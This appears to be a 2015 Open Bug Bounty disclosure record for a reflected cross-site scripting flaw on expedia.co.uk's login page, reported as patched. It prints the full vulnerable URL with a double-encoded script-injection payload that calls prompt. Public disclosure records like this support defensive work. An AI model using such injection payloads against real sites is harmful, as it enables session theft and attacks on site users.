expedia.co.uk XSS vulnerability

2015-08-16T14:49:00
ID OBB:79533
Type openbugbounty
Reporter dim0k
Modified 2015-08-16T14:52:00

Description

Vulnerable URL:
http://www.expedia.co.uk/user/login?&hsuc;=&fram;=&uurl;=qscr%3dredr%26rurl%3d%2fFlight-Search-All%3finpPackageType%3dFLIGHT_ONLY%26inpInfants%3d2%26origref%3dnull%26inpArrivalTimes%3d362%26afflid%3d022116%252527%25253bprompt%252528/XSSPOSED/%252529%25252f%25252f496%26
Details:

Description| Value
---|---
Patched:| Yes, at 26.09.2015
Latest check for patch:| 26.09.2015 01:23 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 4927
Google Pagerank| 6
VIP website status:| Yes
Check expedia.co.uk SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 16 August, 2015 14:49 GMT
Vulnerability existence verified and confirmed| 16 August, 2015 14:52 GMT